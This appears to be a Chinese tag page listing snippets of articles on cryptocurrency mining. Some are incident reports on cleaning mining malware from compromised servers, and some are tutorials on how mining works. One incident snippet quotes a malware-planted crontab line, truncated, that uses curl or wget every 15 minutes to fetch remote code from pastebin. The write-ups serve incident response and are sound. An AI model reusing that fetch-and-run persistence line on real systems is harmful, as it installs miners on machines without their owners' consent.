#挖矿

记一次生产环境中挖矿病毒的处理

故障发现:  生产环境的服务无法访问,502错误。将k8s集群中的所有pod内存加起来达不到服务器实际物理内存的四分之一,而后根据top命令查出进程,再根据进程查文件,最后杀掉进程,k8s集群开始恢复正常。事后措施:修改ssh端口,修改密码,更新ssh免密文件。禁止root用户远程登陆,使用脚本进行防ssh爆破。总结:...

记一次Xmrig挖矿木马排查过程

问题现象Linux服务器收到报警信息,主机CPU跑满。自动创建运行Docker容器xmrig,导致其他运行中容器被迫停止。问题原因通过top命令可以看到有一个xmrig进程占用了99%的CPU。经定位,该进程是一个挖矿木马程序,通过上述截图可以看到进程对应的PID为2647,根据进程ID查询一下产生进程的程序路径:ll...

挖矿-门罗币

https://wallet.mymonero.com一定要记好MNEMONIC,否则登不上钱包。https://www.f2pool.com/注册账号,找到对应币的挖矿软件也要查看矿池地址xmr-stak登录服务器,下载挖矿软件wget--no-check-certificatehttps://github.com/...
代码星球 ·2020-04-16

以太坊挖矿原理

以太坊的共识机制是PoW(ProofofWork工作量证明机制),使用的算法是Ethash,这种算法是对Dagger-Hashimoto算法的改良版本,流程大概如下1.对于每一个块,首先计算一个种子(seed),该种子只和当前块的信息有关;然后根据种子生成一个32M的随机数据集(cache)2.根据Cache生成一个1...
代码星球 ·2020-04-14

服务器中了挖矿病毒

这几天阿里云云服务器cpu一直跑满,一查发现有个定时任务,在搜索一下,发现自己中毒了,原来前几天搞redis学习的时候设置了个弱密码,被ssh暴力破解植入病毒了。crontab-l*/15****(curl-fsSLhttps://pastebin.com/raw/v5XC0BJh||wget-q-O-https://...

Kworkerd恶意挖矿分析

转自:https://www.360zhijia.com/anquan/417114.html TOP显示CPU占用高,但是没有高占用的进程 存在与未知服务器13531端口建立的TCP连接 文件/etc/ld.so.preload中指向了/usr/local/lib/libntp.so&n...
代码星球 ·2020-04-12

莱特币挖矿入门图文教程

   1、首先下载挖矿工具:   (1)挖矿代理:stratum_proxy   链接:http://pan.baidu.com/s/1jHHB7KU密码:3lx9   (2)CPU挖矿软件:pool...

挖矿程序的工作原理(BTC为例)

Mining时代进化:CPU挖矿->GPU挖矿->FPGA挖矿->ASIC挖矿CPU挖矿时代:SENGENERATEGPU挖矿时代:GETWORKMiner:挖矿的程序或者机器统称矿工 挖矿本质:执行Hash函数的过程,而Hash函数是一个单输入单输出函数,输入数据就是一个区块头 ...

解决阿里云服务器提示挖矿程序风险

     今天大早上收到阿里云邮件通知,提示有挖矿程序。一个激灵爬起来,折腾了一早上,终于解决问题了。  其实前两天就一直收到阿里云的通知,检测到对外攻击,阻断了对其他服务器6379、6380和22端口的访问,当时没怎么当一回儿事,反正是我用来自己学习用的,就放着不管了,结果今天事态就大了。那就来解决吧。  ...
首页上一页12下一页尾页